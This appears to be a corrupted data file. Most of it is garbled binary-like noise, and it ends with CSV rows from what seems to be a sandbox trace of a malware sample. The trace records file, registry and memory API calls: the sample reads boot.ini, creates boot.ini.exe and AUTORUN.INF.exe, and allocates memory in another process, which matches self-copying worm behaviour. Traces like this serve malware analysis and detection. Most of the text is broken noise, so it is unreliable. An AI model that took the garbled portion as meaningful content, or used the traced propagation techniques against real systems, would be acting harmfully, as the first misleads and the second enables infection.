ZzCONGC{^`UV
F7	bK^MTK
]r_XPCI
2b"q&7f@
\UCICD
N}LK^U
hRDUE[[jDENTGd
@bawaiqe
}_GT%K@G9'
'*7 ~m
azgJYBMYYTwY\Q
pADWSMC~
\JTA]CO
UX\U@OALKY
~GUVvK@G
cczt#b`
{MBQF5
UX\UGHBBKY
oPTULGjK
dlr%vd2
^_aqubj
TA|_!J
0ZfE_MPN
73qrs`b
_yCONG
pIC6H_VpQNh(
cdzsr`b
ATDbVg
C DTWBP~PT
73qrs`b
	WlMOT
Q[\SJN
a1w{ d1C
OF[,DYVG^m
sq~g_Cambtxt
JKZUC[_V
+K@Ga^G2!&
Y[0n31
BQj][SC~#mKFYVW_EV
PFuS]]FSFmARQKQ
!p-#gptfc#rsC=o
5K]BQs
Ca6'v'bg
Dn['00
]Iv^_T~QYT
hUWOI^[dNCE
\M^^_	AROU
'SB_DP\x[
saxum7$w}
$u+w6zzf4d+1w
UX\U@OALKY
~GUVvK@G
cczt#b`
{MBQF5
ATWYGECO
dGKmAQViI[#M4D
dlr%vd2
~us)>{xpq~-uG
qHBCSOpa
','00'm\VKCL
Z}AONGF}V`UV]Df_aK^
PTPSTRT
HD`TQbDS@
7WUF\r
F`lz s16
UCICDT
lMO6x}
7<7WOVvUR
Z}AONGF}V`UV]Df_d\V
cST~FW
*S@vA`A
Ga1pz|0e@I
Y[%ii{
6!$adk
aog?#qY@iI[Ex:
Y[]$sEBBU_E MBV
CmVKD]E~IoDSE]McRPDBY@H
TGMQXG[
&6PUtC@W
v9y|ebu
O[B7VrIDUB1
{_^C]llgG
bKFDERtURPDZZg\WPIk_RW
X@QdENS
w%*)6 [_VGA
LJU>Y\Ug
&ONGB7VrIDUB1Wu^K
kW^SvC`o
lgzaulXBPD^W
HUuQKK^G
!vy$b,z;c|y%CJ
qs{}kq!=4a
@2m& rcb
QL	QJST
aCF3DLD
CJwH]dEN	]qMCpEP_R
[,LF&A^
EAFLIFANq
]E{FUBNMR
kfc^\^ZQCZ^^dMAT
6GVC\R
	QHU	T
20w"r2aAH
^G;? 4}ow
_[l5YSB_C^
q{NAX[BG
Vo]E_M`XZ_DC
	UWRUQV
PDiA48F
EHEBPU
a0"u|`j
geaNOqa
NHaS\C\y
D]H	SC
GtP@VO
WY\QBHEZQY
pTU\dEN
ODfltzt5`
C^SS@*
t@G\D7_7W
ATWY@B@A
fGKmDW^iI[}Oe
d3rpvj0
-(rinwb0d'w`iaf$7
MPDGC^G:$
&16:<LpgZ\N
D`_Y^E
*DOsVWCeVgEZEU
$[_V68aog
\A7A@gG
t@FHK1[cHPUH
&G^[tMN
+essucbG
rIDUCe^4PEV	]hW]AQ~C`o
wTWUEREY_]
:@^CPUcJjK?0n}u+c
^~EONG
[2,hrz
TNa(/8
	QYeu@YE\
V]GV^[
+essucb
A[euu!os|qcb!g}~m!
\ZWU]^
QXG?GKm'
&MZxKFU
@CQSK_VDI
qe;succ
8FphkF
FGKKEDB[
|'}qsxy
_QE^R@luddF]GBesBACU^G`WJ]]\Z~|MX[SKIQdrJ@ZVE
SRRUQRXVR]
AHEGT[
ICd\R]q
jl u'6a
Dn['00
xxskgmaafgbvkgcg~
^@eLU-TJ
GTk{PV
BhqZ\NYBUP
/lK^UB@CCV\
fC_ZQr_NI
kwoa#f0D
)TsOGTEf
JKSZGV^[
pIEiBWBOoV
HF %|}bd|
JYGcW\G
c\QSuX\U
e{wwsq
[SSDz^{A
PIEQDFBO
0lq'qk6
)|$k<'`0cqzvsweub
HSqCD#
PCQ<37
:=FCUQpa
CY_^lt
<W`hG@
W{ICVBd_cCXBK
WUPVPP
V{DGBiSIuZ{
JK?00:6'6O
*UQTvY]T
cER{UHI
"\OooP}Vs@DR@e_bQPU
@cQSsYGDIfC@W
2QUQ'0.aiq
PEVGjK
me;succ
AKU6Q]U
@hxmTrHMUDg^gB]ET
@cQSsYGDIfC@W
2QUQ'0.aiq
GMFdEN
iI[~ks;ucc
7\G@N=:
EDpIE\Cc\cUQP
fGKmFU^iI[#
;G_[55,!w~gu^KVId
amn}ac+
@cER{T
BIEmwABPhdVdUCJYX]m`___QQKGoqZ\N[@UP
bbuaiq!GKKQXP
dEN7HY
U^{UIt
6.'6!mJ`I
UCd_bTP\
3Biwinzeeat~dlca}|
N\qAP{GU
d]VBNV
Am`_WQ
ECX[Y>f
V]]TEWG@SO
cJKXG \
jd%pr2cG
C\W^@EBI
jKSeAG^[bS\WIg@`
v/}fa|A
FFJF]zRO
IA[@gU[
uQGIXMF
!(D[\TJIDGT]
cSOPr_NI
kwoa#f0D
)TsOGTEf
\QS]QXPM
~G_xBUXrR
"%/(`cr
\)s :h|~wv.i/xw~}{$G
qCDBGQPI~+
010,<=~|MNEA
^yF\RUF~WtW@QEvCuC]LG
CICDU\
g:dEN	]mE
q}CCFQ^V[oPAY^Wlg\]YSZSAdkLDXM^GF
FGjK]T
w1&": V^[
HLI.Q\EUuI2
980 PcD`UV
!(NBfPUER}P]U
|WoW@]TIfQA[VCR
6VX]%_
qdrtsq
Bl3,+)'
#`UVG_v
v}tmksw_Xg|dnlcra
q[TDUMP]k
^UGe4Z
FmtCKG
j1@GBQXCh>C
JK]QK[_V
Fbl{"&eb
AvCuCXCS
CQSYQyx[
kUP|AU^xSK}Vc
jc}~epi
q(v=;*+vp{itt q{*q
MCWFP=(]
A>f]ZFCUElsW^P
0 Z\N<'&1g^Y
VD5_7\
RFJFGTP_JA
(RItL`@
@jauwp26
X!' *&0!7?gbv
':17dEN	R
MJVUMP
VDlgY_
_U_~-;
HMhrMEXM
V^[pIC6#
X{UHI]
^~E]STJmJ`
MZo@dYTN
JK]TDOQXG
6X\|T[ 4q]VENQEVm}YPD]KAR@huELP]GQpaME@UXMa
VXREep
aD\L\~
F5gruvbe
HPySAgu]
blstvbc
~rr?npfk1v*091fte
CGPFR>{
F>rAFPILBfUP_K	
cdzsr`b
B*_&HM]
7YfD_A]
d\R2LW
rv+z7kq
!(qgsr|cd
]Fh]XSlMOT
R^zQN'N5
rt()a3rC
~{u{sn)*-),427-$li
oEA!:0,#'
uELFCU
15BR*Y5
~#mKFYVW_EV
BDzSUjK]QvCAGK
 \iZBZZ	\k
RXDBKLA
@e7zwsgfCI
j-,5:0,!& #vsw
77CXG*
5iI[~k
,#'$C^Gl5YSB_C^
UIoQ[BT]qTPTCC
asptu|
R3DQF[zCZEUgTuDEN#20?!7(
Zcessubb
PBl`KDTJdXaTQT
.QXG+cen
  CXGdEN
moc|'}qsxy
7LS6BX7M=JRn}_ZE	B\UM?d
BBkuLG
V93X\XW^
E>|LFXZ
PFuS]]FSFmARQKQ
!p-#gptfc#rsC=o
A7`!rqgq
VY]TK[_V
}:.$-:
JOlwbxzoevpt
@CQSK_VDI
WIg;%GMV#
UFrKG]DGHcRW]Q_
Xr&(pk~zn4vv%
#tw}3*unad|l|
*zqm}`muq|}ac%!%+6[_V	
< 1* <DX~g
^T_GCm&
9}Q05M55:
!(FEtTJYEVUqSWTBE
sslipxwgpic"
Fr|y|c/ph6b,m!
IAeUV{G
X)\MsLbCI
2b"q&7f@
"7-*"9
-qipqya/5
&@gGIU
c^S@GQBGpo
' BIEmqW^P
PAqEXT
^aD\ESQ
JKS\GV^[
pIEiBWBOoV
HF %|}bd|
[gKARZUcVMP
bRRUvYXT
gauaiqb
xD[TPJv^ 
VE0	`TWW
@UEEQLEK
j` zw7g
N\qCR{GU
eBXMUqZ]U
bcmwqeq
TTDySz@L
PIEQDFBO
YDRsAbA
7a{&r12
gUXWIlW]U
bRRUvYXT
gauaiqb
xD[TPJv^ 
VE0	`TWW
@UEEQLEK
Ajg'w}6d@M
]AQlMOS
!(u@YE\v^_T
bdumqge
SCyPwAM]
^G_^ADD@
2T]BS|M4
Fgm&t'2kGO
AbUNYGxQ]G
/XGSTwP\R
carrs}g
\~K@GK
GW*DTZ
yWtOA]Jl
EWW_JC
GHaWU@
Gd7"{ 0d
XRzCZEUlMO
cbprucg
SBbYbJPL
R`BSKL5X^
66tstgd@
Z@fC@W
blstvbc
b^dST\
cdwt'e1
HSjEF2;
blstvbc
b^aD\L\
FJFgTPgLP
IAderwr1e@
Y[ C\l7
!(qgsr|cd
VE.V'@
VRA><FT
d7u!|ge
cdzsr`b
B*_&HM]
7YfD_A]
cdwt'e1
HSdEN&
cbprucg
SBbYg]X\O\U
JFHD6PVfC\G
A] O5C
G0bsrqd1
ML	QJST
/Ywqstjc
OD[wBTS
VRA><FT
d7u!|ge
r^M0000g^Y
VD5_7\
RFJFGTP_JA
aQ]AR'N5
g`"&q2dC
VX]]QUQ
;C@W2<
'"4):=E
_zMONG
$LMRJe	dE
R^zQN'N5
rt()a3rC
VX]WQUQ
2LHNG^
XlYOSQJmJ`
IAeUVeB
oUZAP$
Ct"-y7cq
XiI[KW\
CICDU\
lMO6x}
XlYOSQJmJ`
G1RW`AR
O4XXCQp
's*(`0t
UCICDT\
lMO6x}
7<$QIkL|N	%
X`AYTG^mWvAVIQ2Z1
%%|.dfq
/0,7q/&
)S{NMT
|UHqO5
gcwv$6gC
XiI[KW$.6 ,7),q
:3+	=NI
ZzCONGC{^`UV
F7	g\V]
's*(`0t
UCICDU
a?&*'g^Y
VD5_2K
PV^EMG
5V\DQr
pu|-0f$
WX^G_[
qDM!! 61q^(
f4&w$d2
VY]TA[_V	
#DR$N[C*&
AU@IP)S!
A\Dm^1A^
2BUCMa
MGr ~-g1!
ZVY\UCHBFGA
;M[gZX
XlYOSQJmJ`
IAeUV{G
X)\MsLbCI
'v(~66p@
j-,5:?605)2oma
;'1GjK
<DXUC^G4
DlgY^U
^bsIDX_Phx
qqyaaiq;dENUU
cK%) +
]DgE@Fo[
bVVCDPBUo{[[\[F[DX~c[^FCUKkqEDKR
:4Z]^UPP
C4DXBSsQU]@NA`c'%wbe
DZTG^m
JoCTFMfCa
upy|fdw
6JW QK
tQR\R@;h
ecv{|k1@O
HDZw__T
@mJ`HEREvCp
HMOB@Q]
!(fW\TMUqZ]Ug
k{wvqq
NHq[\SwV
zYo%12+piru
bcq&$ej
GZ"ZU\N
/[XG>;
zWBYdF_E
dfrsu`e
N\gL[CVEL_q[\SwV
zYo%12+piru
@vXXR,W
=$a5x$j&'
UX\UGHBBKY
~GPP~K@GD
A5`zt|b5
|D[QTD}
#OMVJc
WY\VEKKZQX
aFWQVIdQ[Wg
5dpp|0`FHDTM
>xAB[g
uQGK^GRqSAIQ
DR"676&,.}~g
6Kyod[\T
`dssqbb
!OESEaWnJ
R9397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->268"
"20190731004116.446","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b
!"XBvG
>C:\AUTORUN.INF","dwDesir
ccess->GENERIC_READ"
,"1,:",(d5cv
q88ac6
Jdfz173162e)61
y6f1e2
y8s6ceq","
gf9les
CCE3qb,
~0;000
qw31004116.
rCRWVId
>QXP*woa
64m\G^3UIuHq
,NIlCAGEu&CqX}(#lftlc4vy5o0j!c
FbCT~]@
@Tjq^D^
TGpTBX\QUxAOGBG
kg(p1/vfe|p"
QvC\Y(U
Ap#,~w~g
HM181<2nca
DGQBUms_P@C
PF}G_KCQ\cOA
~rwt4zt>b x 
HD`TQ|AS\.
di#03&&+!1+9}yq
 GMV	6:
,%1$2PI~r
B\Q^TmvUN\J
lpldxad~
FFp]QEP
Xtr/u7p'nk} '
qpv|j+!<dd-2w
"Z]YUp@
@16pu!5a
dEN)B_
GXE@pD
2e&z!bj
JWUUA;hG
\GrUTBQBB
"Z]YUTLPW
!(PWWXJDEJ
fTV~^Q_rGUgIc
q3v #fj
MA^zSO
y''~n{rr~{+$
EC^Gm|^UPCQ
[cPFEPUq[_^SuL
gLVKN5Q	G
@6gaog?#cHFPIQ
3LRDS}YYG
PZr^MEQ[V
QvC\Y(U
Ap#,~w~g
BL1ii{	%=74-3
VDETBUl}KOP
\T$.,,(@/
CK|HRuX\U
b\Qm\G
4CXK)/
> 7$/+`
X@qxhiWI
cXUEGQFTm|GW@VQCDEh{ma
HDVT@ZRS
ICr\EPT
qyartde
@U^{UJqZ{
,+'!M@a_
**)&3aa}9t
{l5YSB_C^VD~cn)RB
VpEW_UE
_{MVnW
]FtLL\K0
	B+E\K
BUWK~~PK
bRT`EUFHgPBAW|Z{
~cen3g&D
UGxMrCRWVIr
!(fWFXZU~\r_^@C^Z
ewoatgk
	QHU	T
AT_K_V
vcen9"
WX`WJD
Y]E]vCUUoIO<
LJU7RZTQ
AVC\QDATR
bbuaiq7GZKS
D UFYSGeM/
"CAG~k
f`nJIoT[ST
F[k^wWLXP	Y 	Q\
R	U	T	
FxXt@^_]
ICXp]{B
@7ZC\N
[W7@U_y
055G^qY
R8	<-:?
&59-#$'ew~=
C_VDls
VQU\]U
TSUWVW
V^[fIT;
&BZ&BS
=^QQUUT
\Ap^uFWVUF
CIBDUO
me;subaDO
FUBNMR
"DRU6Q]U
s|raL^s
WSPQT	R
FTG^UG
\iI[II
618=,-
0)$nvy6u
\@cM@gG
_p^uFWVUFbXLK
WCeZKS
WQ~GEDEXGH
me;succ
w`}`mrut}ac%}*(p
APDSiuP[
k7! ve7D
F[k^rXXV^M
519`YD501n{c+
~W2.hgo4
sq|o|qsjel)RcW
`xlDWBbPJR
]Dz[XG
@KY\UK
ZFzN\J
e\V)CR
MAeduupkj
	+{ k;
vz"z=(sadk
_wTFYWT
B*	vVYMC	_t
BUWXCDPU
a3 pqq
rEVVUCeYXI
x{tionca-<
+1W^L	
~KR3UI
WSPQT	R
PTV^EV^[DEN7
ws;ucc
ODYIdLS-VNL
jrZWFK\K>!/`
FPE\U'PT
Zv|v$1
ridpy}
bcq&$ej
	~ii{9%#&25,9$.jel
@gG*x}
*5'UMPGpa
D[LQEyDn[EQKvCp
UXEGCO
ICd\TvG
@6gaogbb
ZVY\UCHDLGA
@cER{UA
_Q0U:#
dqQy[ADTT
oyU\D|T
FFp]QEP
Xtr/u7p'nk} '
qpv|j+!<dd-2w
XzSOp@n
N@0fu'#ab
*.w{sn~rvz}ac.-$!7[
* 7< MJVl;
`B[RTE]}s
[W7@U_~QIuHu
V\pU\MOC
yG8.hgo4
sq|n}qsjel#N|P
c_VDGQFGQGKQB^J_QGms
V^[qya
RILiI[->>NI
me;succ
^~E\[]PcD*2
 8;aqupxk}cNBk|u
gZ_V[CCQda@C
iz{jx"
AHEGT[
ICaKZMR%Y	WF
j6u! aq
b]Sm\G
%mJ`*!&0
y{umn}~muyfomay}vg
5@[|\HK
UCYEZ^Md!-.
MAdTWRsQU]@NA`c'%wbe
DZTG^m
pIC6HYgDQFItlfWWuIn
beswtbb
BTp_Y]
@16pu!5a
LbW\SRDmJ`
uCQUDGKcNWg
dfrsugb
 \URwP
_s_e3xw|.4emdSRQJL
@GHcRRREQ
!," !00+7(ch
_oCVvXUU
cewrte}
,PsOBPKmW0
fmz{'10
^uXZWH_
PG^mWsNBG_v	;	
ZxKFUwP\R
carrs}g
\~K@GK
GW*DTZ
yWtOA]Jl
kl{!'0`
Z{r|:i.*qc`}|pt~kbgDEN	
~aK0',0*5'~omo
XlYOSQJmJ`
HD`TQbDS@
7WUF\r
F`lz s16
UCICDT
	+CAG~k
tIPQEM
ZyCONGC{^`UV
F7	bK^MTK
F0[CBFPZs	
6g'p|j0
!LZrZ^G
\@qTTJ
VrIVIQ0
!(D^q]U_TREY_ZeHAK
SBOEA]T
64uzvjdA
edwwuq^(
r^MRQKQefK
cwoa#?
PCVGOVExY
^yF\RUF~WtW@REvCpTU\
qdrtsq
CICDU\C
cesrvaq
}|+ytlK
_cE]RU_
VrIY&Cd_zBYDU
]	X[WR
QUWPVW
DdK@GEuU
CRQK_V
2dEN6woa
]|WA@	
CTP_QXP
3dEN6woa
qPIEK_V
[W7@U^{UI}Lu
Cd_gBX
]Ab[V~\[
xZHPCA5P
^TEJBBW
0c!&wq
bU_2WIP
771`UV#2
]^bTUWIlPY]
	VjRKG
SR	\ZRS\
7fzz&e1G
]^g@[iI[
qL\P	V0
GORKi^
F`lz s16
_pK@G_[W
771`UV#2
]^g@[iI[
TQUW]W
WBO@ES_GM
0c!&wq
bU_{RIL%+
@RbAZiI[K
0e&q!`j
BUWYCL
GMF~kurqgc
]DnC@W
SR	\ZRS\
7fzz&e1G
]^g@[iI[
qL\P	V+
[][\CU
F`lz s16
_pK@G_[W
771`UV#2
]^g@[iI[
qL\P	V+
[][\C>
F`lz s16
_pK@G_[W
771`UV#2
]A}AWrGU
xWAMN5P
^TEJBBW
0c!&wq
bU_,RIL%+
qyartde
@U^sQ[iZ9lYO101
BDfL@gGH
a`q/q?
fmz{'10
^uXZWH_
PG^mWsNBG_v
bGj[WWBHoQ[FTuHc
hu|uw~g
5W]CS{YT]O\"CF-"
BTp_Y]
@16pu!5a
LbW\SRDmJ`
[Q~DQ^ihsgJg
dfrsugb
eDT}PA
!.0zr8
_DdfGAIBMUZ
bQPUpGXR
FTEg^dW
KGKKB@J[
Fbl{"&eb
[zSKH_
tzqef:
\UCKB@U\
gBDDUvYA&
~essucc
ZyCONGC{^`UV
F7	bK^MTK
cST~FW
*S@vA`A
Ga1pz|0e@I
C}RIL!
-37<0qIPF
T@wTCYFTUwMWREQ
^T{CA]A
64uzvjdA
0oCF69aNOqa
BFWDPdtQ
nf_]UYE
=uLAKR
BNCPTCkeJIN
G^QtdxVGQ]x\[\RuH
b{wz|q
lSRdFSPUt
4CXK<;
ZV\`B_D
fQ\EU~QYG 4aSSY\
WSPQT	R
DX]RE[_V
QXG?GMF
nE@!41:
SP	\QRQ\
@q@@\XQQVEM
@_XUx]^G 4a
lfp~s|fclGHBBKY
~dG]DuG
OJG\ZA
wrrreq
@kwoa+
&ONGPcD.	7
jf}ztmZY~AIBMUZ
lxQ]A{K
u^KETq_NI
JK?00:6'6O
Zcessuba
DUCd_gJ
PxDYVUPBl`KDTJdXaTQT
cRWFjK
NIQ*&7&(q
Zvqy|eb'
!.'xssO
hzcCOvfN
e|xpp|cJ
mbKYHj~`MRUTG_
EfIQXCRRcOA
HM>6: ?ko}
7(0E:I+ lip
_zMONG
$LMRJe	dE
s]Z\RsJGM
jfzt&c6
GjK?0n}
^~E]RG^m
yQdPTW
RXqNaeASDXV^cJAU
fDZESt
d6s&w7`
NGZdENT
]U]^@I
vCu!<7&hme
aDAW]EQef
D@c]]XUCXK	
bTQTvK@GD@r!:7&&'~
DCWQKmJ`H@]QxM4P
0c!&wq
VY\\C[_V
DUvY\UCO
_[l5YSB_C^TD~{K
9yVS\QyQLlmG@
SP	\QRQ\
V^[pIC6#
^~E]R\BmJ`
r[Y@M~cV[^V
WX[SQUQ
6X\}TM
abdV@_]
`V]T\lpTB]Z[H
pTPSpK@GPIE:&71<q
AKU=Hg
v#qnyp+lYO@IP'-'
Y[C,_bUQT
\R[kNGU
|QYTsCZ@WXvIZE
[VIdX]R
q&:016>
cerquq
xVrIDG_v
EZybG_U
DENTBNEVIOR^M1
dEN&PIC'0
&(<'GxJPIC
dEN6x}s=cc
`F^RS]Gqr
@(\JTA]Cn<
W_ZPK@K
F1@XBVw_^
`lt u6aF
@C]SG_QLbW.
bawsg^Y
XHeVMPEu\F^G
S3D^USFKp|O\W
BLvISt
@(WJVA\A;hG
WXZKGJEVIO
b3pt$c6
C\W^@EBI
dKS{DGMVT
ODfltzt5`
O]{}!?m}yppzm( uqzwrA
qCDEfVDGpo
9:KBF8
&7 :MB~uEL
CCVVDmJ`H@]QxM1G
2SMeX[
0c!&wq
@1GMF*
\@&YVM
nhfSDP
STQVWR_
NGTK@GBHDBGA
?K@GpIE
Dd:9&n{c+
=*5)rswr|}~g/&
^@bLR|VH
g~wbyujs~aKRFWQCD
[]XNB:pB
Y_jsMHUW
S_UVUjt
ojq,a#)~
UX\UGHBBKY
~GPP~K@GD
A5`zt|b5
|D[QTD}
#OMVJc
CUW]BEDW
pIEbQLtMN
b3pt$c6
SwRTRN
U@b[\GKWXG_[
iBKXG%
maaNOqa
W\EvW$JC
C1V3CPL
64uzvjdA
j-,5:0,!& #vsw
<DXUC^G4
DlgY^T
HLjdGQB
_[WTBC
	WQUQETZ
06![zCNYG->>NI
me;succ
3LRCTzU]G 4qFQCMEG
DENTBNEVIOPIE;
?K@GpIE
Dd:9&n{c+
036hpbnagup/&
^@bLR|VH
g^WBYUJS~aKRFWQCD
[]XNB:pB
Y_jsMHUW
C0crusfk
G\*FT[
p[XGBeXaPEV
HY_B@FI
!(pWWb\DaR]EUqIf
kcaogbg
FgWZ@]wY
~u^TCOIL
lcDQBD
_qWqIVhyv]bTXT
}^VRnE@
2[_V68aog
cesaiq?RjKNIl	+
A[BRUK
_wEZQTB
RsHBKGgYu^KEQ
TVVW	V
wp~zw~gDENG_[
&/$nso
DGQBUl/QA^M
{[DB][^~]eN[SX\CkvI@\[CTD
`DKXG4
QXP*woa
64m\GLgG
c-ssucc
9,-:nkdcqzd}XYg`
\G`DR{QH
}[^BUMPThuKOP	F
5SCE_ZVeh
ntNC]Y@
C0crusfk
G\*FT[
p[XGBeXdGMF_[QXG@B[/&
`UVhERAHfQXDTsVc
jcxxmpi
ZFcYUM
^SIX|^xVE~]
MAeduupkj
*T`UVTBcYu^K
JWEEFM
A\^|VHuHc
huqzw~g
rt?l{.s$u;|x{)*xt
(VOIXa^PGFW@
={PPKX
naYPCTYBtIP
/Ywqstjc
OD[wBTS
cSQzH\V)
efruw62
y|s{sa3;> =-,!6(p
q<374$!6~aKA^M
_GClsD@BGBV8+
P	RQTV
gTuqya
][AM[]DotIM_@DMUE
DENTBNEVIOPIE>
dEN7GKm#0-
~KQrWA
^eDFGPKUk~XSB[B^PZho_LHMFGdaYP
c\EJX	]k1_	P
X\K=&NAZYG]K
bcprsa6C
CuTMpZZ(
cdzsr`b
].~|nfr3ae$~1f1b|jCO
]Fe@Zr]
EPDVm{[
YJ\_C?g
@GBVgTEEKCL:9
jetptcc
EeYaGQM]O\R
gDSDLnXT
wwz}c` C
Y[#MeL#
/Ywqstjc
OD[wBTS
dSRwI]
+}'<mncap}h{coj/')G_[
@gG._W'*
=;$pi~
< 1* <DX~uEL
U^DfUCAYMB~=&
]R[UYVdeLAlW
ODSP[\B
Sw_ZPo
@$"zz14w
e"c6*`wb
@UVPCCAH
cTQaD\XiI[tLo
 t**`kr
p*&onzyvyug/# {
]QCDEm`_LHM
-3/*!6P
~ii{nwtc
q#f<4zvc
"/exrjN
ATWYGECO
dGKmAQViI[#M4D
dlr%vd2
,-whipdd` /bffjr1
MWE@WPI~?
9VzG42 #;
M@KAEG
`ASCXcB
4GG^[gP[CGiZ%GKK55;5w~gpIEm\G
cess&0q
N@.Q\EU~P\U
76*3&p_Olfodjue
\DbDTeQJ
MW@OC^G:x
DTXBc]KK
^^DVCj
8piz?`
BRTXCDFH
f\Qm\G_
ODsx~ud4v
y}slguw!#/l{%%zxxv
[a+umn"d'9
KOP^BXPVpu
.:W^P7
:.3$':@ENY
LQpYZ{!I
DQ~D8iD
_JGKNA
pcen'7"K_VPU
Jo=.7 	-#6$	'
f[*BXD
QBUl}Y
McVr]\XZYR@muHD]^DKF
~GV~GSLgG
>QXP*woa
64m\G^3UIuHg
NCqya+
j{=ios|qc0&qsp'
2>KnxMA_WMl`Z_T_CBmu[FKSLXtTFKKCL:e
\Z^\B:vO
F4WVyCTXy
Ac0q'vjjA
YL1ii{
&67*	3#:1gTuN\q3#
{f^KTI~
A[H$v_\TUB&
BXdU\HT
cRQm\G
' PUtC@W
c`}oma 
@cER{TH
U~VaGBC\^CeTBC]^_j~[U_AEGBh}Z\N	G
dpx{cpi
aog?#qY@{
_Q;$#-
<<6*9'
&7 GBV:
Mk~~eY_]_@@msEFCTXZb\DQEM_hhM@K
i|OI]	AR
SR	\ZRS\
SWx\N&H2
jl u'6a
LLU$}YSB_C
KncGAltA@[\CUB
C@WU=Hg
v",nyp-iI[
<&nrq+cucob
7LS&am
0/NEYYW^c?N
uKr}WfPCAbQJTIPU
ewoa764K_VB
bUW3MG^[>*	
Di		~KR3UI
P@U_MfRABY_ZmtN^X\DG^~dG]P
.F\]rR
j6u! aq
ueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Personal"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Personal","dwType->1","lpData->C:\Documents and Settings\janettedoe\My Documents","cbData->100"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000110","hKey->0x000000b8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000110","lpValueName->Generation"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x00000110","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000110","lpValueName->Common Documents"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x00000110","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x00000110","lpValueName->Common Documents","dwType->1","lpData->C:\Documents and Settings\All Users\Documents","cbData->92"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000110","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->0x00000110","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Generation"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->C:\AUTORUN.INF.exe","lpNewFileName->C:\AUTORUN.INF"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x00000120","lpFileName->C:\boot.ini","dwDesiredAccess->GENERIC_READ"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->268"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x00000120","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\boot.ini","dwDesiredAccess->GENERIC_READ"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x00000110","lpFileName->C:\boot.ini.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
